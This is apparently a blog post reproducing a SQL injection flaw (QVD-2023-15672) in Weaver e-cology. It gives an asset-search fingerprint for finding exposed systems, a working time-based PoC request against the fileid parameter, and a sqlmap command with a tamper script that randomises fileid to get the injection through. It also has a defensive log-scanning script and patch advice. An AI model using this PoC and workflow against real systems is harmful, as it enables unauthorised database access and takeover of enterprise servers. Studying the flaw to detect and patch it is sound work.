Panwei E-Cology SQL injection vulnerability reappears【QVD-2023-15672】

Disclaimer: Do not use the techniques in this article for illegal testing. Any direct or indirect consequences or losses caused by disseminating or using the information or tools provided here are borne by the user alone and have nothing to do with the author. This article is for educational purposes only.

1. Product Introduction

e-cology, the collaborative management application platform from Fanwei (Weaver), is a large-scale collaborative management platform for enterprises. It integrates an enterprise information portal, knowledge document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management and data center functions.

2. Vulnerability overview

Because Fanwei e-cology does not effectively filter user input and splices it directly into SQL query statements, the system contains a SQL injection vulnerability. A remote, unauthenticated attacker can use it to obtain sensitive information and, by exploiting it further, gain control of the target system.

3. Affected versions

Ecology 9.x patch version < 10.58.0

Ecology 8.x patch version < 10.58.0

4. Reproduction environment

Hunter (鹰图) asset-search fingerprint:
web.icon="41eca7a9245394106a09b2534d8030df"


5. Vulnerability recurrence

PoC

GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=123+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1 HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

PS: The fileid parameter is the injection point, and both POST and GET work. In testing, the value of fileid (which can be chosen arbitrarily) has to be changed for every injected request, otherwise the injection does not succeed (you can verify this yourself). This is also the weak point of the vulnerability.

Dragon POC (screenshot not reproduced)
Using sqlmap

Write a tamper script that changes the random number in fileid on every request, so that the payload is sent with a fresh value each time and the injection succeeds.

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

fileid=12*&isFromOutImg=1

Try to inject:

python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs


6. Remediation

Temporary mitigation
Restrict the source addresses allowed to reach the system, and do not expose it to the Internet unless necessary.
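Alongside restricting access, the injection point described in section 5 can be watched for in web-server logs. The following script is an added example and not part of the original post: it scans constructed access-log lines for requests to the FileDownloadForOutDoc endpoint whose fileid is not a plain integer, flags the time-based keyword used in the PoC after URL-decoding, counts distinct fileid values per source address (the change-the-value-every-request behaviour noted above), and lists POST requests that the access log alone cannot judge. It assumes combined log format and that legitimate fileid values are numeric.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/weaver/weaver.file.FileDownloadForOutDoc"
# Assumption: a legitimate fileid for this handler is a plain integer.
NUMERIC = re.compile(r"^\d+$")
SQL_HINT = re.compile(r"waitfor\s+delay|sleep\s*\(|union\s+select|'|--", re.I)
# Combined log format: ip ident user [time] "method target proto" status size
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+) (?P<size>\d+)')

# Constructed sample lines, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jul/2023:10:00:01 +0800] "GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=123&isFromOutImg=1 HTTP/1.1" 200 5120
10.0.0.9 - - [20/Jul/2023:10:00:02 +0800] "GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=123+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1 HTTP/1.1" 200 0
10.0.0.9 - - [20/Jul/2023:10:00:08 +0800] "GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=124%20WAITFOR%20DELAY%20%270:0:5%27&isFromOutImg=1 HTTP/1.1" 200 0
10.0.0.9 - - [20/Jul/2023:10:00:14 +0800] "POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1" 200 0
10.0.0.7 - - [20/Jul/2023:10:00:15 +0800] "GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=77&isFromOutImg=1 HTTP/1.1" 200 4096
"""

def analyse(log_text):
    """Scan access-log text for abuse of the FileDownloadForOutDoc fileid parameter.

    alerts: GET requests whose fileid is not a plain integer, with the reason.
    unjudged_posts: POSTs to the endpoint; the body is not in the access log, so
    they need WAF or request-body logging to judge (the post says POST works too).
    distinct_fileid_per_ip: number of different fileid values per source; a high
    count in a short window matches the change-the-value-every-request pattern.
    """
    alerts, posts = [], []
    ids_per_ip = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["target"].startswith(ENDPOINT):
            continue
        if m["method"] == "POST":
            posts.append((m["ip"], m["ts"]))
            continue
        # parse_qs decodes both '+' and %XX, so encoded variants collapse to one form
        fileid = parse_qs(urlsplit(m["target"]).query).get("fileid", [""])[0]
        ids_per_ip[m["ip"]].add(fileid)
        if not NUMERIC.match(fileid):
            reason = "sql keyword" if SQL_HINT.search(fileid) else "non-numeric fileid"
            alerts.append({"ip": m["ip"], "ts": m["ts"], "fileid": fileid, "reason": reason})
    return {"alerts": alerts, "unjudged_posts": posts,
            "distinct_fileid_per_ip": {ip: len(v) for ip, v in ids_per_ip.items()}}
```

Because the decoded fileid is compared against an integer pattern rather than a fixed payload, the per-request randomisation of the value does not help an attempt evade the check.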

Upgrade
The vendor has released an official security patch; affected users are advised to upgrade to version 10.58 or later as soon as possible.
https://www.weaver.com.cn/cs/securityDownload.asp#

Origin blog.csdn.net/holyxp/article/details/131868278